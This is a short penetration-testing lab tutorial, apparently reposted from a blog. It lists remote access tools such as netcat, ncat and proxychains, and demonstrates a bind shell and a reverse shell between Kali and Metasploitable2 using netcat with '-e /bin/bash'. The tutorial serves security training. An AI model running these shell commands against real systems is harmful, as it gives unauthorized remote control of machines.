其他分享
首页 > 其他分享> > Penetration Test - Selecting_Pen_Testing_Tools(8)

Penetration Test - Selecting_Pen_Testing_Tools(8)

作者:互联网

Remote Access Tools

Tool Notes URL
SSH Secure shell Included or available in most OSs
NCAT Similar to nc, but from Nmap developers https://nmap.org/ncat/
NETCAT Same as nc Included or available in most OSs
Proxychains Forces TCP connections through a proxy https://github.com/haad/proxuchains
DEMO 1

Blind shell

Attacker: Kali Linux Target: Metasploitable2

Run the following commands on Target VM.

nc -lvp 4444 -e /bin/bash

image-20201117201308500

Then Run the following commands on Attacker VM.

nc 10.0.0.21 4444

image-20201117201347921

image-20201117201427083

DEMO 2

Reverse shell

Attacker: Kali Linux Target: Metasploitable2

Run the following commands on Attacker VM.

nc -lvp 4444

image-20201117202158176

Then Run the following commands on Target VM.

nc 10.0.0.18 4444 -e /bin/bash

image-20201117202239998

image-20201117202319728

QUICK REVIEW

标签:nc,Run,Target,Selecting,Testing,VM,Attacker,Pen,4444
来源: https://www.cnblogs.com/keepmoving1113/p/13996281.html